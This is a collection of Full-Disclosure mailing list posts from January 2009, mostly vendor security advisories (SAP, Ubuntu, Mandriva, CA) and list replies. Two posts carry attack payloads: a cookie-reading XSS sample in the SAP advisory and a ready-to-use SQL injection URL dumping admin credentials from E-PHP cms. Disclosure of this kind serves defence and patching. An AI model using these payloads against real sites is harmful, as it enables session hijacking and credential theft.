[Full-disclosure] SAP NetWeaver Cross-Site Scripting
# # # COMPASS SECURITY ADVISORY # http://www.csnc.ch/en/downloads/advisories.html # # # # Product: NetWeaver/Web DynPro # Vendor:SAP (www.sap.com) # CVD ID:CVE-2008-3358 # Subject: Cross-Site Scripting Vulnerability # Risk: High # Effect:Remotely exploitable # Author:Martin Suess martin.su...@csnc.ch # Date: January 27th 2009 # # Introduction: - The vulnerability found targets the SAP NetWeaver portal. It is possible to execute JavaScript code in the browser of a valid user when clicking on a specially crafted URL which can be sent to the user by email. This vulnerability can be used to steal the user's session cookie or redirect him to a phishing website which shows the (faked) login screen and gets his logon credentials as soon as he tries to log in on the faked site. Affected: - - All tested versions that are vulnerable SAP NetWeaver/Web DynPro [for detailed Information, see SAP Notification 1235253] Description: A specially crafted URL in SAP NetWeaver allows an attacker to launch a Cross-Site Scripting attack. The resulting page contains only the unfiltered value of the vulnerable parameter. It is possible to create an URL which causes the resulting page to contain malicious JavaScript code. A response to such a request could look like the following example: HTTP/1.1 200 OK Date: Fri, 18 Jul 2008 13:13:30 GMT Server: server content-type: text/plain Content-Length: 67 Keep-Alive: timeout=10, max=500 Connection: Keep-Alive htmltitletest/titlebody onload=alert(document.cookie) /body/html The code only gets executed in Microsoft Internet Explorer (tested with version 7.0.5730 only). In Firefox (tested with version 3.0 only) it did not get executed as the content-type header of the server response is interpreted more strictly (text/plain). SAP Information Policy: --- The information is available to registered SAP clients only (SAP Security Notes). Patches: Apply the latest SAP security patches for Netweaver. For more detailed patch information, see SAP notification number 1235253. Timeline: - Vendor Status: Patch released Vendor Notified:July 21st 2008 Vendor Response:July 28th 2008 Patch available:October 2008 Advisory Release: January 27th 2009 References: --- - SAP Notification 1235253 (problem and patches) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] E-PHP cms SQL Injection Vulnerability
E-PHP cms SQL Injection Vulnerability # Dicovered By: SaiedHacker Group:HackeranShiraz Security Team Web Address: www.HackeranShiraz.Com E-mail:saiedhackeri...@yahoo.com Creator: http://ephpscripts.com # Demo Exploit: http://ephpscripts.com/demo/cms/browsecats.php?cid=-12%20union%20select%200,concat(es_username,0x3a,es_password),2,3%20%20from%20esnm_admin # Exploit: http://Target/cms/browsecats.php?cid=-12%20union%20select%200,concat(es_username,0x3a,es_password),2,3%20%20from%20esnm_admin ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [USN-712-1] Vim vulnerabilities
=== Ubuntu Security Notice USN-712-1 January 27, 2009 vim vulnerabilities CVE-2008-2712, CVE-2008-4101 === A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 7.10 Ubuntu 8.04 LTS Ubuntu 8.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: vim 1:6.4-006+2ubuntu6.2 vim-runtime 1:6.4-006+2ubuntu6.2 Ubuntu 7.10: vim 1:7.1-056+2ubuntu2.1 vim-runtime 1:7.1-056+2ubuntu2.1 Ubuntu 8.04 LTS: vim 1:7.1-138+1ubuntu3.1 vim-runtime 1:7.1-138+1ubuntu3.1 Ubuntu 8.10: vim 1:7.1.314-3ubuntu3.1 vim-runtime 1:7.1.314-3ubuntu3.1 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: Jan Minar discovered that Vim did not properly sanitize inputs before invoking the execute or system functions inside Vim scripts. If a user were tricked into running Vim scripts with a specially crafted input, an attacker could execute arbitrary code with the privileges of the user invoking the program. (CVE-2008-2712) Ben Schmidt discovered that Vim did not properly escape characters when performing keyword or tag lookups. If a user were tricked into running specially crafted commands, an attacker could execute arbitrary code with the privileges of the user invoking the program. (CVE-2008-4101) Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim_6.4-006+2ubuntu6.2.diff.gz Size/MD5: 199371 085ca7601cc068cc572c8cee1d25529f http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim_6.4-006+2ubuntu6.2.dsc Size/MD5: 1331 42f100409e8290158363e03eba87126c http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim_6.4.orig.tar.gz Size/MD5: 5740778 b893e7167089e788091f80c72476f0d3 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-doc_6.4-006+2ubuntu6.2_all.deb Size/MD5: 1732888 bcbc824e5296fea0ea3dd16b2ca54bc8 http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-runtime_6.4-006+2ubuntu6.2_all.deb Size/MD5: 3594550 84cc69c7fd6b266f697d189cd67c1f69 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-common_6.4-006+2ubuntu6.2_amd64.deb Size/MD5:83548 8445c214e8f5d3b04077800b3c795799 http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-gnome_6.4-006+2ubuntu6.2_amd64.deb Size/MD5: 844928 1bf3bfb3b3552f2b7f77d9250517cbed http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-gui-common_6.4-006+2ubuntu6.2_amd64.deb Size/MD5:70034 7c8e29ed88bde4310459b8adfa6a5243 http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-tiny_6.4-006+2ubuntu6.2_amd64.deb Size/MD5: 84 99bd94b62dfb322a66dc1c1a98ef4efb http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim_6.4-006+2ubuntu6.2_amd64.deb Size/MD5: 664378 f99c5f44f075e507727cfde6e4f4ac5c http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-gtk_6.4-006+2ubuntu6.2_amd64.deb Size/MD5: 842724 3121ac81e306aca18d1ce7a8de71ba9e http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-perl_6.4-006+2ubuntu6.2_amd64.deb Size/MD5: 846792 705dcb476de0bb335ffdf74f7f0596a0 http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-python_6.4-006+2ubuntu6.2_amd64.deb Size/MD5: 842742 98bd00409e7bc852a53ecc019ee89b28 http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-ruby_6.4-006+2ubuntu6.2_amd64.deb Size/MD5: 838130 6e1b1064fb3aa016ba69fc77b6be912b http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-tcl_6.4-006+2ubuntu6.2_amd64.deb Size/MD5: 800738 708dfae6260edef8c7dcc5f8d4cf9c81 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-common_6.4-006+2ubuntu6.2_i386.deb Size/MD5:83114 9831f107a9a9b5544265e2ab53eb5afb http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-gnome_6.4-006+2ubuntu6.2_i386.deb Size/MD5: 713796 32f00306228eecffa22a77de84ae0949 http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-gui-common_6.4-006+2ubuntu6.2_i386.deb Size/MD5:70036 ffca389f01faaaf229ed4a016d37274d http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-tiny_6.4-006+2ubuntu6.2_i386.deb Size/MD5: 366068 76ea071f100dcad8de93b685b278dcf5 http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim_6.4-006+2ubuntu6.2_i386.deb Size/MD5: 555212 34446768f4d4bf93e189e9d98752d9a6
[Full-disclosure] CA20090126-01: CA Anti-Virus Engine Detection Evasion Multiple Vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Title: CA20090126-01: CA Anti-Virus Engine Detection Evasion Multiple Vulnerabilities CA Advisory Reference: CA20090126-01 CA Advisory Date: 2009-01-26 Reported By: Thierry Zoller and Sergio Alvarez of n.runs AG Impact: A remote attacker can evade detection. Summary: The CA Anti-Virus engine contains multiple vulnerabilities that can allow a remote attacker to evade detection by the Anti-Virus engine by creating a malformed archive file in one of several common file archive formats. CA has released a new Anti-Virus engine to address the vulnerabilities. The vulnerabilities, CVE-2009-0042, are due to improper handling of malformed archive files by the Anti-Virus engine. A remote attacker can create a malformed archive file that potentially contains malware and evade anti-virus detection. Note: After files have been extracted from an archive, the desktop Anti-Virus engine is able to scan all files for malware. Consequently, detection evasion can be a concern for gateway anti-virus software if archives are not scanned, but the risk is effectively mitigated by the desktop anti-virus engine. Mitigating Factors: See note above. Severity: CA has given these vulnerabilities a Low risk rating. Affected Products: CA Anti-Virus for the Enterprise (formerly eTrust Antivirus) 7.1, r8, r8.1 CA Anti-Virus 2007 (v8), 2008 eTrust EZ Antivirus r7, r6.1 CA Internet Security Suite 2007 (v3), 2008 CA Internet Security Suite Plus 2008 CA Threat Manager for the Enterprise (formerly eTrust Integrated Threat Management) r8, 8.1 CA Anti-Virus Gateway (formerly eTrust Antivirus Gateway) 7.1 CA Protection Suites r2, r3, r3.1 CA Secure Content Manager (formerly eTrust Secure Content Manager) 8.0, 8.1 CA Anti-Spyware for the Enterprise (Formerly eTrust PestPatrol) r8, 8.1 CA Anti-Spyware 2007, 2008 CA Network and Systems Management (NSM) (formerly Unicenter Network and Systems Management) r3.0, r3.1, r11, r11.1 CA ARCserve Backup r11.1, r11.5, r12 on Windows CA ARCserve Backup r11.1, r11.5 Linux CA ARCserve client agent for Windows CA eTrust Intrusion Detection 2.0 SP1, 3.0, 3.0 SP1, 4.0 CA Common Services (CCS) r11, r11.1 CA Anti-Virus SDK (formerly eTrust Anti-Virus SDK) Non-Affected Products: CA Anti-Virus engine with arclib version 7.3.0.15 installed Affected Platforms: Windows UNIX Linux Solaris Mac OS X NetWare Status and Recommendation: CA released arclib 7.3.0.15 in September 2008. If your product is configured for automatic updates, you should already be protected, and you need to take no action. If your product is not configured for automatic updates, then you simply need to run the update utility included with your product. How to determine if you are affected: For products on Windows: 1. Using Windows Explorer, locate the file arclib.dll. By default, the file is located in the C:\Program Files\CA\SharedComponents\ScanEngine directory (*). 2. Right click on the file and select Properties. 3. Select the Version tab. 4. If the file version is earlier than indicated below, the installation is vulnerable. File NameFile Version arclib.dll 7.3.0.15 *For eTrust Intrusion Detection 2.0 the file is located in Program Files\eTrust\Intrusion Detection\Common, and for eTrust Intrusion Detection 3.0 and 3.0 sp1, the file is located in Program Files\CA\Intrusion Detection\Common. For CA Anti-Virus r8.1 on non-Windows platforms: Use the compver utility provided on the CD to determine the version of Arclib. If the version is less than 7.3.0.15, the installation is vulnerable. Example compver utility output: COMPONENT NAME VERSION eTrust Antivirus Arclib Archive Library 7.3.0.15 ... (followed by other components) For reference, the following are file names for arclib on non-Windows operating systems: Operating SystemFile name Solaris libarclib.so Linux libarclib.so Mac OS Xarclib.bundle Workaround: Do not open email attachments or download files from untrusted sources. References (URLs may wrap): CA Support: http://support.ca.com/ CA20090126-01: Security Notice for CA Anti-Virus Engine https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=1976 01 Solution Document Reference APARs: n/a CA Security Response Blog posting: CA20090126-01: CA Anti-Virus Engine Detection Evasion Multiple Vulnerabilities community.ca.com/blogs/casecurityresponseblog/archive/2009/01/26.aspx Reported By: Thierry Zoller and Sergio Alvarez of n.runs AG http://www.nruns.com/ http://secdev.zoller.lu CVE References: CVE-2009-0042 - Anti-Virus detection evasion http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0042 OSVDB References: Pending http://osvdb.org/ Changelog for this advisory: v1.0 - Initial Release
[Full-disclosure] [ MDVSA-2009:030 ] amarok
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:030 http://www.mandriva.com/security/ ___ Package : amarok Date: January 26, 2009 Affected: 2008.1, 2009.0 ___ Problem Description: Data length values in metadata Audible Audio media file (.aa) can lead to an integer overflow enabling remote attackers use it to trigger an heap overflow and enabling the possibility to execute arbitrary code (CVE-2009-0135). Failure on checking heap allocation on Audible Audio media files (.aa) allows remote attackers either to cause denial of service or execute arbitrary code via a crafted media file (CVE-2009-0136). This update provide the fix for these security issues. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0135 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0136 ___ Updated Packages: Mandriva Linux 2008.1: 1a8246a202bcc785f761a97978599a58 2008.1/i586/amarok-1.4.8-12.2mdv2008.1.i586.rpm 1783e7430e515d4a6144647c50ae8def 2008.1/i586/amarok-engine-void-1.4.8-12.2mdv2008.1.i586.rpm 7ea34714db78c48ba57efba24259b1e8 2008.1/i586/amarok-engine-xine-1.4.8-12.2mdv2008.1.i586.rpm 9741e2d710a7f0138b17d8ae5253db3b 2008.1/i586/amarok-engine-yauap-1.4.8-12.2mdv2008.1.i586.rpm 07e042b5b18e4d3c7e030d8fcf796b07 2008.1/i586/amarok-scripts-1.4.8-12.2mdv2008.1.i586.rpm 260e9de9cecd888ff2f2d27f2ded127f 2008.1/i586/libamarok0-1.4.8-12.2mdv2008.1.i586.rpm 2267841689410ebf301431611c626da1 2008.1/i586/libamarok0-scripts-1.4.8-12.2mdv2008.1.i586.rpm 301b052ea6661df51e95cb0e7d616961 2008.1/i586/libamarok-devel-1.4.8-12.2mdv2008.1.i586.rpm 815a7454f91161542127005d1b4d5143 2008.1/i586/libamarok-scripts-devel-1.4.8-12.2mdv2008.1.i586.rpm e06458ad6529e0be044c136797bfa1c8 2008.1/SRPMS/amarok-1.4.8-12.2mdv2008.1.src.rpm Mandriva Linux 2008.1/X86_64: ffdd3bd41a32d4e62f816c109df8 2008.1/x86_64/amarok-1.4.8-12.2mdv2008.1.x86_64.rpm ec10186c7ede7a88e5b17556cdd2dfb0 2008.1/x86_64/amarok-engine-void-1.4.8-12.2mdv2008.1.x86_64.rpm 43afd708057335d8240d8089dac7b407 2008.1/x86_64/amarok-engine-xine-1.4.8-12.2mdv2008.1.x86_64.rpm 3495536bfa3eb6316bc9f4b3bf0e21d0 2008.1/x86_64/amarok-engine-yauap-1.4.8-12.2mdv2008.1.x86_64.rpm f686b429164bcf5568c354fe04069aca 2008.1/x86_64/amarok-scripts-1.4.8-12.2mdv2008.1.x86_64.rpm 37c16f39f142bbe43f77ebd8662a1241 2008.1/x86_64/lib64amarok0-1.4.8-12.2mdv2008.1.x86_64.rpm 7d655865abe84d513fc6b661f06ca8ef 2008.1/x86_64/lib64amarok0-scripts-1.4.8-12.2mdv2008.1.x86_64.rpm e2e6f738de6f3d4adec513b3fc6fd46d 2008.1/x86_64/lib64amarok-devel-1.4.8-12.2mdv2008.1.x86_64.rpm 21a51b57b01ea6e9b2623c8f7b73a20e 2008.1/x86_64/lib64amarok-scripts-devel-1.4.8-12.2mdv2008.1.x86_64.rpm e06458ad6529e0be044c136797bfa1c8 2008.1/SRPMS/amarok-1.4.8-12.2mdv2008.1.src.rpm Mandriva Linux 2009.0: dfa1b151504f4f1d300b1c20d2759569 2009.0/i586/amarok-2.0-1.2mdv2009.0.i586.rpm 074f96428803ec95886965de2430b1d7 2009.0/i586/amarok-scripts-2.0-1.2mdv2009.0.i586.rpm 7bc361ce058e5e28f76fffca7b45e804 2009.0/i586/libamarok-devel-2.0-1.2mdv2009.0.i586.rpm 4f3f0f5b6fe7b82722056c60e145e55e 2009.0/i586/libamaroklib1-2.0-1.2mdv2009.0.i586.rpm 98975dd8bd348c8b497c706550559798 2009.0/i586/libamarokplasma2-2.0-1.2mdv2009.0.i586.rpm 3f411fc8f8a2d5040071e3c5c17e0750 2009.0/i586/libamarokpud1-2.0-1.2mdv2009.0.i586.rpm 00449f621b74a45337c6edf067155639 2009.0/i586/libamarok_taglib1-2.0-1.2mdv2009.0.i586.rpm 250b512463a015324ae1f7bce6a4381f 2009.0/SRPMS/amarok-2.0-1.2mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: 9d3041f66c3c88492c9b217625a3d8b9 2009.0/x86_64/amarok-2.0-1.2mdv2009.0.x86_64.rpm 6336ad0873c72428133dc72499edb386 2009.0/x86_64/amarok-scripts-2.0-1.2mdv2009.0.x86_64.rpm e2af1726c929428a61cef94c28561f69 2009.0/x86_64/lib64amarok-devel-2.0-1.2mdv2009.0.x86_64.rpm ecdafc395867d7c62e02015faa000d15 2009.0/x86_64/lib64amaroklib1-2.0-1.2mdv2009.0.x86_64.rpm c682cd1bd6b557184fe81f1aa2fb2953 2009.0/x86_64/lib64amarokplasma2-2.0-1.2mdv2009.0.x86_64.rpm 76af360ed85f551f6aa8e204ef2f2f43 2009.0/x86_64/lib64amarokpud1-2.0-1.2mdv2009.0.x86_64.rpm abaf80b0b0d0e7bd5ca32ba7413671aa 2009.0/x86_64/lib64amarok_taglib1-2.0-1.2mdv2009.0.x86_64.rpm 250b512463a015324ae1f7bce6a4381f 2009.0/SRPMS/amarok-2.0-1.2mdv2009.0.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can
Re: [Full-disclosure] NO-IP service Flaw
On Tue, 27 Jan 2009 00:41:59 GMT, infoloo...@gmail.com said: What if you are sniffing the traffic for any http session the information is submitted in clear text. If you're traffic sniffing, you'll see the data whether it's GET or POST. The distinction becomes important for things like http proxies and things that log/remember URLs - it's somewhat bad form to leave a userid/password sitting right there in the browser 'recent URLS' list or in a logfile someplace. If you're passing the data in the URL, at best it can be obfuscated and reversed fairly easily (unless you've got enough Javascript to pop open a dialog window and use an entered value as a salt for encrypting before transmission). Yes, the proper thing to do here is a POST over https. Personally, I'm surprised that a frikking *domain registrar* is that clueless about basic security (the *biggest* issue in what would otherwise be a pretty minor vulnerability). Or maybe I'm not, actually.. I wonder what *else* they got wrong? pgpb3ibhTCTPq.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Solaris Devs Are Smoking Pot
To block nastygrams like this and others, you should be able to do this with ipfilter rules like this: echo '@0 block in quick all with short' | ipf -6f - and/or add said rule to the top of your ipf6.conf file. Unfortunately the exploit expects you to be using Linux, so I'm somewhat challenged to verify this at present. Darren -- Darren Reed darr...@reed.wattle.id.au ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] (no subject)
Hi, I found that service Flaw on November, i contact them and drop away. Yesterday i was going to burn a cd with tons of txt and found that to be relevant for a disclosure. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [USN-713-1] openjdk-6 vulnerabilities
=== Ubuntu Security Notice USN-713-1 January 27, 2009 openjdk-6 vulnerabilities CVE-2008-5347, CVE-2008-5348, CVE-2008-5349, CVE-2008-5350, CVE-2008-5351, CVE-2008-5352, CVE-2008-5353, CVE-2008-5354, CVE-2008-5358, CVE-2008-5359, CVE-2008-5360 === A security issue affects the following Ubuntu releases: Ubuntu 8.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 8.10: icedtea6-plugin 6b12-0ubuntu6.1 openjdk-6-jdk 6b12-0ubuntu6.1 openjdk-6-jre 6b12-0ubuntu6.1 openjdk-6-jre-headless 6b12-0ubuntu6.1 openjdk-6-jre-lib 6b12-0ubuntu6.1 After a standard system upgrade you need to restart any Java applications to effect the necessary changes. Details follow: It was discovered that Java did not correctly handle untrusted applets. If a user were tricked into running a malicious applet, a remote attacker could gain user privileges, or list directory contents. (CVE-2008-5347, CVE-2008-5350) It was discovered that Kerberos authentication and RSA public key processing were not correctly handled in Java. A remote attacker could exploit these flaws to cause a denial of service. (CVE-2008-5348, CVE-2008-5349) It was discovered that Java accepted UTF-8 encodings that might be handled incorrectly by certain applications. A remote attacker could bypass string filters, possible leading to other exploits. (CVE-2008-5351) Overflows were discovered in Java JAR processing. If a user or automated system were tricked into processing a malicious JAR file, a remote attacker could crash the application, leading to a denial of service. (CVE-2008-5352, CVE-2008-5354) It was discovered that Java calendar objects were not unserialized safely. If a user or automated system were tricked into processing a specially crafted calendar object, a remote attacker could execute arbitrary code with user privileges. (CVE-2008-5353) It was discovered that the Java image handling code could lead to memory corruption. If a user or automated system were tricked into processing a specially crafted image, a remote attacker could crash the application, leading to a denial of service. (CVE-2008-5358, CVE-2008-5359) It was discovered that temporary files created by Java had predictable names. If a user or automated system were tricked into processing a specially crafted JAR file, a remote attacker could overwrite sensitive information. (CVE-2008-5360) Updated packages for Ubuntu 8.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6_6b12-0ubuntu6.1.diff.gz Size/MD5: 222090 25681e25a40ae36385d2429e8b905009 http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6_6b12-0ubuntu6.1.dsc Size/MD5: 2355 281bc682638116538e829499572e3cde http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6_6b12.orig.tar.gz Size/MD5: 54363262 f3aa01206f2192464b998fb7cc550686 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-doc_6b12-0ubuntu6.1_all.deb Size/MD5: 8468244 7746db24f22ff25e7655bd9ad73b7077 http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jre-lib_6b12-0ubuntu6.1_all.deb Size/MD5: 4708568 3e9ffbcebcadc431e5c1a21b80e9a9b7 http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-source_6b12-0ubuntu6.1_all.deb Size/MD5: 25619670 4eb18b9cdd11778e80ce6b1ac63c2040 http://security.ubuntu.com/ubuntu/pool/universe/o/openjdk-6/openjdk-6-source-files_6b12-0ubuntu6.1_all.deb Size/MD5: 49156890 044fa2fafc22c35568c01e46f85dbf0a amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/icedtea6-plugin_6b12-0ubuntu6.1_amd64.deb Size/MD5:81028 8f3c35e45a001a5bb5e7d7231656e206 http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-dbg_6b12-0ubuntu6.1_amd64.deb Size/MD5: 47370572 db9493bf071aa08183a7aeef6efc71ea http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-demo_6b12-0ubuntu6.1_amd64.deb Size/MD5: 2366078 639ac32c62c5b951a77a0a58fcf8ee70 http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jdk_6b12-0ubuntu6.1_amd64.deb Size/MD5: 9942620 ac6600eb8cddc9afd55d37a646ba3a89 http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jre-headless_6b12-0ubuntu6.1_amd64.deb Size/MD5: 24087518 d9b0e9f7a0f6df9392eed8c67fa77acd http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jre_6b12-0ubuntu6.1_amd64.deb Size/MD5: 241532 404e268000d8d15e903f67eb4383146e i386 architecture (x86 compatible Intel/AMD):